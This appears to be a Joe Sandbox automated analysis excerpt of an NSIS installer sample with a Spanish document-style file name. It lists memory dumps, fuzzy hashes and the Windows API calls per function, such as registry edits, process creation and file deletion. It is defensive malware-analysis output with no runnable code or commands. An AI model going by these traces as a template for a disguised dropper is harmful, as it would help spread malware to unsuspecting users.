                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 86a1fdfe899c9ceab9d698116da87040fc40dd599bb220daf872e279e0fa4e64
                                                • Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
                                                • Opcode Fuzzy Hash: 86a1fdfe899c9ceab9d698116da87040fc40dd599bb220daf872e279e0fa4e64
                                                • Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59
                                                APIs
                                                • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                • lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                • lstrcatW.KERNEL32(00422708,00402EAD,00402EAD,00422708,00000000,00000000,00000000), ref: 004053CC
                                                • SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2531174081-0
                                                • Opcode ID: f8a8d88fafabd2705d4bfb02e3f721ca981156685056b2b6c2762235eb49562f
                                                • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
                                                • Opcode Fuzzy Hash: f8a8d88fafabd2705d4bfb02e3f721ca981156685056b2b6c2762235eb49562f
                                                • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68
                                                APIs
                                                • DestroyWindow.USER32(?,00000000), ref: 00402E4E
                                                • GetTickCount.KERNEL32 ref: 00402E6C
                                                • wsprintfW.USER32 ref: 00402E9A
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32(00422708,00402EAD,00402EAD,00422708,00000000,00000000,00000000), ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
                                                  • Part of subcall function 00402E17: MulDiv.KERNEL32(?,00000064,?), ref: 00402E2C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: 7ab4736549933f7d70d83e7d18d719c287e01965cee6ce59e825f2c0a875d467
                                                • Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
                                                • Opcode Fuzzy Hash: 7ab4736549933f7d70d83e7d18d719c287e01965cee6ce59e825f2c0a875d467
                                                • Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
                                                • GetMessagePos.USER32 ref: 00404C5E
                                                • ScreenToClient.USER32(?,?), ref: 00404C78
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                • Instruction ID: 3ec40d72beee944c7b32a6f5f5203a90e51618c2e0ef94a62ef03edc632050ca
                                                • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                • Instruction Fuzzy Hash: 88015271901218BAEB10DF94DD45FFEBBBCAF58711F10012BBA51B61C0C7B499018B95
                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                • wsprintfW.USER32 ref: 004065CE
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
                                                • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8
                                                APIs
                                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DB6
                                                • wsprintfW.USER32 ref: 00402DEA
                                                • SetWindowTextW.USER32(?,?), ref: 00402DFA
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                • Instruction ID: 5b31381c318dcc107e486aeb82f0cbc8ffe93b2faae57e60c2f54a212ea49e40
                                                • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                • Instruction Fuzzy Hash: 53F0367154020CABDF245F50DD49BEA3B69FB44304F00803AFA05B51D0DBB959658B99
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
                                                • GlobalFree.KERNEL32(?), ref: 0040296C
                                                • GlobalFree.KERNEL32(00000000), ref: 0040297F
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 2712055f727695e9a6cffbaa8955d27e4e1bb918ceb0f77b2a7d08c0dd9579ad
                                                • Instruction ID: 8996c306b55a9cd0cf00445349fd93af405541c9de08eca1dd931963291c836b
                                                • Opcode Fuzzy Hash: 2712055f727695e9a6cffbaa8955d27e4e1bb918ceb0f77b2a7d08c0dd9579ad
                                                • Instruction Fuzzy Hash: C221BF71800124BBDF116FA5CE49D9E7E79EF09364F10423EF8507A2E0CB794D418B98
                                                APIs
                                                • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                • wsprintfW.USER32 ref: 00404BD7
                                                • SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$(7B
                                                • API String ID: 3540041739-1320723960
                                                • Opcode ID: bd2d3db077ee8e583910a32854825a9f0c2e072d4a2c3eefa0bf5777e55b2ddc
                                                • Instruction ID: 06844f863ebb5207f96fa0dde493c575b08da8a3ff5d6269356cbccd3d727cca
                                                • Opcode Fuzzy Hash: bd2d3db077ee8e583910a32854825a9f0c2e072d4a2c3eefa0bf5777e55b2ddc
                                                • Instruction Fuzzy Hash: E211D873A0412877DB00666D9C41F9E32989B85374F150237FA25F31D1DA79D81282E9
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,758E3420,00437800,00435000,00403425,00437800,00437800,00403672), ref: 00406509
                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                • CharNextW.USER32(?,00000000,758E3420,00437800,00435000,00403425,00437800,00437800,00403672), ref: 0040651D
                                                • CharPrevW.USER32(?,?,758E3420,00437800,00435000,00403425,00437800,00437800,00403672), ref: 00406530
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":
                                                • API String ID: 589700163-165019052
                                                • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                • Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
                                                • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                • Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32(00422708,00402EAD,00402EAD,00422708,00000000,00000000,00000000), ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID:
                                                • API String ID: 1941528284-0
                                                • Opcode ID: 6285280ce05e970252caada2d1d245646b8803942fbe8435dd818c3768bb975f
                                                • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
                                                • Opcode Fuzzy Hash: 6285280ce05e970252caada2d1d245646b8803942fbe8435dd818c3768bb975f
                                                • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402CB4
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
                                                • RegCloseKey.ADVAPI32(?), ref: 00402CF9
                                                • RegCloseKey.ADVAPI32(?), ref: 00402D1E
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                • Instruction ID: 6ed1dcd439a9d73e7b184d3b9e055cec6739c9c837aa6d28afee44abb1cd8dac
                                                • Opcode Fuzzy Hash: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                • Instruction Fuzzy Hash: 6611377150010DFFEF219F90DE89DAE7B6DFB64348F10007AFA01A11A0D7B58E59AA69
                                                APIs
                                                • GetDC.USER32(?), ref: 00401DB6
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: 2d329506c7c101f05e432b59e6409975d0128ccc9750adf40c4c86175a79681a
                                                • Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
                                                • Opcode Fuzzy Hash: 2d329506c7c101f05e432b59e6409975d0128ccc9750adf40c4c86175a79681a
                                                • Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                • Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
                                                • Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
                                                • Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402428
                                                • lstrlenW.KERNEL32(0040B5D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402488
                                                • RegCloseKey.ADVAPI32(?,?,?,0040B5D8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040256D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID:
                                                • API String ID: 1356686001-0
                                                • Opcode ID: f18aa87aa6b79811d6adea6c6b4f71fd68a91caefea6bf7c60a3fb0ca3464567
                                                • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
                                                • Opcode Fuzzy Hash: f18aa87aa6b79811d6adea6c6b4f71fd68a91caefea6bf7c60a3fb0ca3464567
                                                • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68
                                                APIs
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                  • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                  • Part of subcall function 00405371: lstrcatW.KERNEL32(00422708,00402EAD,00402EAD,00422708,00000000,00000000,00000000), ref: 004053CC
                                                  • Part of subcall function 00405371: SetWindowTextW.USER32(00422708,00422708), ref: 004053DE
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                  • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                  • Part of subcall function 004058F2: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
                                                  • Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928
                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401F4D
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 3585118688-0
                                                • Opcode ID: 658cb7c6d423f34adddbd637859a3867049cefa358d112fdf12d9817224f2835
                                                • Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
                                                • Opcode Fuzzy Hash: 658cb7c6d423f34adddbd637859a3867049cefa358d112fdf12d9817224f2835
                                                • Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A
                                                APIs
                                                • CreateDirectoryW.KERNEL32(?,?,00437800), ref: 00405883
                                                • GetLastError.KERNEL32 ref: 00405897
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
                                                • GetLastError.KERNEL32 ref: 004058B6
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553492156.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.7553454503.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553528536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553564922.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.7553605570.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
